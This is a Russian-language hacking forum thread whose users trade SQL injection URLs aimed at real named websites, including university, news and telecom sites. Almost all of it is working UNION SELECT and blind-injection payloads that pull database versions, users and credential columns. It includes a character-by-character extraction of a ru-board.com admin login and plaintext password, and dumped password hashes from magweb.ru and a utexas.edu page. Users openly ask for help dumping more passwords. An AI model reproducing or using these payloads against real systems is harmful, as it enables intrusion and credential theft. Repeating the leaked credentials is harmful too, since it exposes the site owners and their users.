Code: http://bla-bla-bla.ru/borrow/?s=-1+union+select+1,2,3,4,convert(concat(database(),char(58),user(),char(58),version()),char),6,7,8,9,10,11,12,13/*
Фуф. Вот ещё 1 .edu и 1 .net Code: http://bgkulinar.net/news.php?&newsid=-1358+union+select+version()/* http://colab.hunter.cuny.edu/colabcms/event_info.php?eventID=-18+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13/*
Code: http://iwf.ru/main/top.php?id=-2+union+select+1,2,concat(username,char(58),password),4+from+users+where+user_id=1/*
Антибоян обновляеться раз в 14 дней Заодно несколько иньекций Code: http://www.ardi.ee/lanordia/index.php?id=-10+union+select+1,concat(login,char(58),password)+from+users/* Code: http://www.ivek.ee/news/news.php?mode=normal&id=-127+union+select+1,concat(login,char(58),password),3,4+from+users/*&lang=est
TOP 10 [SQL INJ] edu! for KPOT_f1nd Code: http://www.chemistry.montana.[COLOR="Red"]edu[/COLOR]/news.php?id=19+union+select+1,2,3,4,5,6,7/* http://www.grid.iu.[COLOR="Red"]edu[/COLOR]/news/news.php?id=-68+union+select+1,2,concat(user(),char(58),version()),4,5,6,7,8/* http://www.gsb.iastate.[COLOR="Red"]edu[/COLOR]/projectsissues/news.php?id=-12+union+select+1,2,3,4,5/* http://www2.umaine.[COLOR="Red"]edu[/COLOR]/graduate/news.php?id=19'+union+select+1,concat(user(),char(58),version()),3,4/* http://www.nhia.[COLOR="Red"]edu[/COLOR]/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* http://www.physics.hmc.[COLOR="Red"]edu[/COLOR]/news.php?id=21+union+select+1,2,3,4,5/* http://www.csun.[COLOR="Red"]edu[/COLOR]/~humndean/cgi-bin/news.php?id=-118+union+select+1,2,concat(user(),char(58),version()),4,5/* http://acd.[COLOR="Red"]edu[/COLOR]/news.php?id=5'+union+select+1,2,3,4,5/* http://www.informatics.indiana.[COLOR="Red"]edu[/COLOR]/news/news.asp?id=-156+union+select+1,concat(user(),char(58),version()),3,4,5,6/* http://www.bellarmine.[COLOR="Red"]edu[/COLOR]/athletics/news.asp?id=1 or 1=@@version--
Code: http://live.ece.utexas.edu/People/people_detail.php?id=-97+union+select+1,database(),3,version(),password,user,7,user(),9,10,11,12+from+mysql.user/* root:327cc28f2c9db092 me lost :[
Code: http://ru-board.com/new/categories.php?op=newindex&catid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11/* Вывода нет. Возможно, в каком то поле хранится ссылка на файл со статьей... Code: http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring(version(),1,1)))=0x34/* MySQL 4.x
Вот немного покопался глубже: Code: http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),1,1)))=103/* g http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),2,1)))=111/* o http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),3,1)))=100/* d http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),4,1)))=0/* user: god http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),1,1)))=102/* f http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),2,1)))=114/* r http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),3,1)))=101/* e http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),4,1)))=52/* 4 http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),5,1)))=53/* 5 http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),6,1)))=116/* t http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),7,1)))=114/* r http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),8,1)))=115/* s http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),9,1)))=119/* w http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),10,1)))=51/* 3 http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),11,1)))=0/* password: fre45trsw3
Code: http://www.eepublishers.co.za/view.php?sid=-8036+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
Поля подобрал http://www.eepublishers.co.za/view.php?sid=-8036+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/* помогите вывести user u password
.edu кончились... Code: http://www.acconcept.ru/news/news.php?id=-124+union+select+1,version(),3,4,5,6,7,8/* http://romanykultury.info/news/news.php?row=-333+union+select+1,version(),3,4,5/* http://www.hrd.ru/news.php?act=news_by_id&news_id=-283+union+select+1,2,3,4,version(),6,7/* http://www.cews.org/cews/news.php?aid=-384+union+select+1,version()/* наводим курсор на кнопочку "1" в правом верхнем углу
круто ты их подобрал... научи как это делается? а если серьезно, с полями ковыряться не охота, но там таблицы с префиксом ee_, например есть таблица ee_users... да и еще следи за кодировкой...
Code: http://moneyru.com/kat/show.php?tema=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18/* С таблицой проблема может есть скрипт который бы брутил таблицы например вводишь http://moneyru.com/kat/show.php?tema=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18 а скрипт дописывал бы +from+здесь_имена_таблиц/* и подбирал из текстового файла каждую строчку (таблицу) и выводил потом те таблицы в которых нет слова Warning или по другому отсеивание делать, например есть цифра от 1 до 50. Программа SQL Injection TooL не помогла например ввожу туда http://moneyru.com/kat/show.php?tema=1 пробовал и http://moneyru.com/kat/show.php?tema=-1 ввёл сам кол-во полей (18) и выводимые написал что 11. Потом нажимаю брут таблиц она вывела все таблицы что есть в текстовом файле (. Может есть нормальный рабочий скрипт чтобы только таблицы перебирал?
Code: http://www.belt-wrestling.org/ru/fed.php?id=-9999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/* =///
Code: http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/* 160 таблиц: Code: http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,table_name,7,8,9+from+information_schema.tables+limit+160,1/* ---------------------------- phpads_config: Code: http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(admin,char(58),admin_pw,char(58),admin_fullname,char(58),admin_email,char(58),admin_email_headers,char(58),admin_novice),7,8,9+from+phpads_config/* phpads - система управления банерами. root:d8f67c1080703334f221abe74fd4a0f1 А вот самой админки не нашел. ---------------------------- mw_members: Code: http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(name,char(58),password,char(58),description),7,8,9+from+mw_members+limit+0,1/* maglord:a5253ca029930561dce315f35e1741fb
http://www.magweb.ru/adm/ 2Cond... ты на SQL Injection TooL не гони... если сам не можешь пользовать прогу, а остольные могут, то виноват в этом только ты... в поле URL введи: http://moneyru.com/kat/show.php?tema=4 в поле string введи: Code: <b>Каталог - Ресурсы Webmoney</b> и все у тебя найдется и не надо самому там ниче выставлять
cherkasy.ukrtelecom.ua Code: http://www.cherkasy.ukrtelecom.ua/ua/hot_news/?id=-1188+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null-- таблицы почемуто не выводятся=\ Code: http://www.lviv.ukrtelecom.ua/ua/hot_news/?id=-2025+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null-- анологично!
